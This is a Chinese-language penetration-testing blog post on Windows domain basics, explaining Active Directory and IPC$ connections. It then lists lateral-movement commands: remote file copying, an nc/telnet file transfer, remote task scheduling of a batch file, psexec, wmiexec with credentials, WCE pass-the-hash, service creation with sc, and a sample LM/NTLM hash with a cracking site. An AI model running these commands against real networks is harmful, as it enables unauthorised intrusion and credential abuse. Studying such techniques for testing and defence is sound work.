<!doctype html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="域渗透," />





  <link rel="alternate" href="/atom.xml" title="Zeal's Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="之前写过一篇内网当中域渗透的简单文章。好久没遇到忘得差不多了。前几天做项目，正好碰到了域环境，正好有时间，再回顾一下原来的知识，另外把新补充的知识再记录一下。
域相关知识什么是域域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域">
<meta property="og:type" content="article">
<meta property="og:title" content="域渗透基础知识">
<meta property="og:url" content="http://blog.izilong.net/2017/01/24/域渗透基础知识/index.html">
<meta property="og:site_name" content="Zeal's Blog">
<meta property="og:description" content="之前写过一篇内网当中域渗透的简单文章。好久没遇到忘得差不多了。前几天做项目，正好碰到了域环境，正好有时间，再回顾一下原来的知识，另外把新补充的知识再记录一下。
域相关知识什么是域域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域">
<meta property="og:updated_time" content="2017-01-24T06:55:07.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="域渗透基础知识">
<meta name="twitter:description" content="之前写过一篇内网当中域渗透的简单文章。好久没遇到忘得差不多了。前几天做项目，正好碰到了域环境，正好有时间，再回顾一下原来的知识，另外把新补充的知识再记录一下。
域相关知识什么是域域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '11455534',
      author: 'zeal'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://blog.izilong.net/2017/01/24/域渗透基础知识/"/>





  <title> 域渗透基础知识 | Zeal's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?80855801599189e7c62320c9084f72a4";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Zeal's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle">前行，永不止步，</p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'qqzX31xq6PXAbjYf31ym','2.0.0');
</script>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://blog.izilong.net/2017/01/24/域渗透基础知识/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Zeal">
    <meta itemprop="description" content="">
    <meta itemprop="image" content="http://7xtays.com1.z0.glb.clouddn.com/2016/06/1022246677.jpg">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Zeal's Blog">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Zeal's Blog" src="">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                域渗透基础知识
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-01-24T12:07:41+08:00">
                2017-01-24
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/渗透测试/" itemprop="url" rel="index">
                    <span itemprop="name">渗透测试</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/01/24/域渗透基础知识/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2017/01/24/域渗透基础知识/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>之前写过一篇内网当中域渗透的简单文章。好久没遇到忘得差不多了。前几天做项目，正好碰到了域环境，正好有时间，再回顾一下原来的知识，另外把新补充的知识再记录一下。</p>
<h2 id="域相关知识"><a href="#域相关知识" class="headerlink" title="域相关知识"></a>域相关知识</h2><h3 id="什么是域"><a href="#什么是域" class="headerlink" title="什么是域"></a>什么是域</h3><p>域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位，域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后，2个域之间不但可以按需要相互进行管理，还可以跨网分配文件和打印机等设备资源，使不同的域之间实现网络资源的共享与管理，以及相互通信和数据传输。<br>域既是 Windows 网络操作系统的逻辑组织单元，也是Internet的逻辑组织单元，在 Windows 网络操作系统中，域是安全边界。域管理员只能管理域的内部，除非其他的域显式地赋予他管理权限，他才能够访问或者管理其他的域，每个域都有自己的安全策略，以及它与其他域的安全信任关系。</p>
<p>如果企业网络中计算机和用户数量较多时，要实现高效管理，就需要windows域。</p>
<h3 id="域相关概念"><a href="#域相关概念" class="headerlink" title="域相关概念"></a>域相关概念</h3><p><strong>活动目录</strong>是由组织单元、域（domain）、域树（tree）、森林（forest）构成的层次结构。<strong>域</strong>作为最基本的管理单元，同时也是最基层的容器，它可以对员工、计算机等基本数据进行存储。在一个活动目录中可以根据需要建立多个域，比方说“甲公司”的财务科、人事科、销售科就可以各建一个域，因为这几个域同属甲公司，所以就可以将这几个域构成一棵<strong>域树</strong>并交给域树管理，这棵域树就是甲公司。又因为，甲公司、乙公司、丙公司都归属A集团，那么为了让A集团可以更好地管理这三家子公司，就可以将这三家公司的域树集中起来组成<strong>域森林</strong>（即A集团）。因此A集团可以按“子公司（域树）→部门→员工”的方式进行层次分明的管理。活动目录这种层次结构使企业网络具有极强的扩展性，便于组织、管理以及目录定位。</p>
<h3 id="域的搭建过程"><a href="#域的搭建过程" class="headerlink" title="域的搭建过程"></a>域的搭建过程</h3><ol>
<li><p>域控制器安装（win server系统） </p>
<p>先安装一个DNS——安装active directory（注：装这两个都需要系统光盘或镜像；安装active directory时相关的信息选择和命令要按自己的需求来）<br>装好后开始——管理工具，打开active directory用户和计算机——新建用户（密码选永不过期）——在域中设置委派控制（对象为前面建的用户）——完成域控制器就建好了 </p>
</li>
<li><p>电脑加入域 </p>
<p>设置成与域控制器在同一个网段，然后右击“我的电脑”——属性——计算机名——更改——选“域”然后输入你建的域的域名重启就行了（注：这台电脑的计算机名要先在添加到域控制器中去）</p>
</li>
</ol>
<p>参考：</p>
<blockquote>
<p>AD域环境的搭建 基于Server 2008 R2: <a href="http://www.it165.net/os/html/201306/5493.html" target="_blank" rel="external">http://www.it165.net/os/html/201306/5493.html</a></p>
<p>Acitve Directory 域环境的搭建: <a href="http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html" target="_blank" rel="external">http://blog.sina.com.cn/s/blog_6ce0f2c901014okt.html</a></p>
</blockquote>
<h2 id="什么是ipc-连接"><a href="#什么是ipc-连接" class="headerlink" title="什么是ipc$连接"></a>什么是ipc$连接</h2><h3 id="ipc-概念"><a href="#ipc-概念" class="headerlink" title="ipc$概念"></a>ipc$概念</h3><p>IPC$(Internet Process Connection)是共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。</p>
<h3 id="ipc-的作用"><a href="#ipc-的作用" class="headerlink" title="ipc$的作用"></a>ipc$的作用</h3><p>利用IPC$,连接者甚至可以与目标主机建立一个连接，利用这个连接，连接者可以得到目标主机上的目录结构、用户列表等信息。 </p>
<h3 id="ipc-的利用条件"><a href="#ipc-的利用条件" class="headerlink" title="ipc$的利用条件"></a>ipc$的利用条件</h3><ol>
<li><p>139，445端口开启。</p>
<p>ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. </p>
</li>
<li><p>管理员开启了默认共享。</p>
<p>默认共享是为了方便管理员远程管理而默认开启的共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问。</p>
</li>
</ol>
<h3 id="ipc连接失败的原因"><a href="#ipc连接失败的原因" class="headerlink" title="ipc连接失败的原因"></a>ipc连接失败的原因</h3><ol>
<li>你的系统不是NT或以上操作系统.</li>
<li>对方没有打开ipc$默认共享。</li>
<li>不能成功连接目标的139，445端口.</li>
<li>命令输入错误.</li>
<li>用户名或密码错误. </li>
</ol>
<p>###常见错误号：</p>
<ol>
<li>错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限； </li>
<li>错误号51，Windows 无法找到网络路径 : 网络有问题； </li>
<li>错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）； </li>
<li>错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$； 错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。 </li>
<li>错误号1326，未知的用户名或错误密码 ： 原因很明显了； </li>
<li>错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况） </li>
<li>错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。</li>
</ol>
<p>##域内的文件操作</p>
<p>####利用IPC$<br>建立ipc连接以后，就可以访问目标机器的文件（上传、下载），也可以在目标机器上运行命令。</p>
<p>上传和下载文件直接通过copy命令就可以，不过路径换成UNC路径。</p>
<p>何为UNC路径？简单来讲以\开头的路径就是UNC路径，比如\192.168.1.2\c$\boot.ini。</p>
<p>如果要从本地当前目录上传1.bat到192.168.1.2机器C盘根目录下，那么命令就是<br><code>copy 1.bat \\192.168.1.2\C$\</code></p>
<p>反之就是下载。dir、copy、xcopy、move、type的参数都可以使用UNC路径。</p>
<p>####利用Telnet<br>服务端：<code>nc -lvp 23 &lt; nc.exe</code></p>
<p>下载端：<code>telnet ip -f c:\nc.exe</code></p>
<p>####利用文件共享<br>映射目标<br><code>net use x: \\[目标IP]\[地址] [域用户password] /user:[域]\[username]</code></p>
<p>##域内运行命令</p>
<p>###利用计划任务<br><code>at \\192.168.200.100 15:00 c:\hack.bat</code></p>
<p>###psexec<br>psexec针对远程建立连接的认证方式有两种，一种先建立ipc连接，然后直接用psexec \192.168.200.100 cmd命令开启一个半交互式的cmdshell，另一种是在psexec的参数中指定账号密码。<br>参数：</p>
<blockquote>
<p>-s 参数用来以system权限执行</p>
<p>–accepteula 绕过第一次运行的弹窗</p>
<p>-c &lt;[路径]文件名&gt;:拷贝文件到远程机器并运行（注意：运行结束后文件会自动删除）</p>
<p>-d 不等待程序执行完就返回</p>
</blockquote>
<p><code>psexec \\192.168.1.2 c:\hack.bat</code></p>
<p>###wmiexec<br>T00ls大牛写的一款工具。早就传开了。<br>半交互模式：<br><code>cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password</code></p>
<p>单个命令执行的模式：<br><code>cscript.exe  wmiexec.vbs /cmd 192.168.1.1 username password  &quot;command&quot;</code></p>
<p>如果有时候我们抓取到的是hash，破解不了时可以利用WCE的hash注入，然后再执行WMIEXEC（不提供账号密码）就可以了。</p>
<pre><code>cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1  
wce -s [hash] 
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1
</code></pre><p>###SC创建服务执行<br>    1、系统权限(其中test为服务名)<br>    sc \DC1 create test binpath= c:\cmd.exe<br>    sc \DC1 start test<br>    sc \DC1 delete test</p>
<pre><code>2.指定用户权限启动
sc \\DC1 create test binpath = &quot;c:\1.exe&quot; obj= &quot;centoso\administrator&quot; passwrod= test
sc \\DC1 start test
</code></pre><p>##hash相关知识<br>windows的密码是经过hash后存储的，本地存在sam，system注册表中，域里面存在ntds.dit中。密码hash有两种格式，LM hash和NT hash。</p>
<p>| 2000 | xp | 2003 | Vista | win7 | 2008 | 2012 | </p>
<p>前面三个默认是LM hash,当密码超过14位时候会采用NTLM加密 </p>
<p><code>test:1003:E52CAC67419A9A22664345140A852F61:67A54E1C9058FCA16498061B96863248:::</code></p>
<p>前一部分是LM Hash，后一部分是NTLM Hash 当LM Hash是<code>AAD3B435B51404EEAAD3B435B51404EE</code> 这表示空密码或者是未使用LM_HASH</p>
<p>LMhash可以用在线网站秒破： <a href="http://www.objectif-securite.ch/en/ophcrack.php" target="_blank" rel="external">http://www.objectif-securite.ch/en/ophcrack.php</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/域渗透/" rel="tag"># 域渗透</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/01/21/2016总结/" rel="next" title="2016总结">
                <i class="fa fa-chevron-left"></i> 2016总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>

          
          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2017/01/24/域渗透基础知识/"
           data-title="域渗透基础知识" data-url="http://blog.izilong.net/2017/01/24/域渗透基础知识/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://7xtays.com1.z0.glb.clouddn.com/2016/06/1022246677.jpg"
               alt="Zeal" />
          <p class="site-author-name" itemprop="name">Zeal</p>
          <p class="site-description motion-element" itemprop="description"></p>
        </div>
        <nav class="site-state motion-element">
        
          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">1</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/zealsec" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/zeal_sec" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://xmanblog.net" title="Xman" target="_blank">Xman</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.lzdoscar.cn" title="LZD_Oscar" target="_blank">LZD_Oscar</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://byllin.cn" title="IsLands" target="_blank">IsLands</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.nodiexiaoqiang.cn" title="Xiaoqiang" target="_blank">Xiaoqiang</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.mianhuage.com" title="Cotton" target="_blank">Cotton</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.zemal.me" title="Osheevn" target="_blank">Osheevn</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.am0s.com/" title="律师" target="_blank">律师</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://zhuling.wang" title="Br3ad" target="_blank">Br3ad</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.leo-blog.cn" title="Leo" target="_blank">Leo</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.kirito-blog.cn" title="Kirito" target="_blank">Kirito</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yangjiye.top" title="Spld3r" target="_blank">Spld3r</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.zning.net.cn" title="Zhangning" target="_blank">Zhangning</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#域相关知识"><span class="nav-number">1.</span> <span class="nav-text">域相关知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#什么是域"><span class="nav-number">1.1.</span> <span class="nav-text">什么是域</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#域相关概念"><span class="nav-number">1.2.</span> <span class="nav-text">域相关概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#域的搭建过程"><span class="nav-number">1.3.</span> <span class="nav-text">域的搭建过程</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#什么是ipc-连接"><span class="nav-number">2.</span> <span class="nav-text">什么是ipc$连接</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ipc-概念"><span class="nav-number">2.1.</span> <span class="nav-text">ipc$概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ipc-的作用"><span class="nav-number">2.2.</span> <span class="nav-text">ipc$的作用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ipc-的利用条件"><span class="nav-number">2.3.</span> <span class="nav-text">ipc$的利用条件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ipc连接失败的原因"><span class="nav-number">2.4.</span> <span class="nav-text">ipc连接失败的原因</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Zeal</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"zealblog"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
      
      <script src="/lib/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
      <script src="/js/src/hook-duoshuo.js?v=5.1.0"></script>
    
    
    <script src="/lib/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  












  
  

  

  

  

  


</body>
</html>
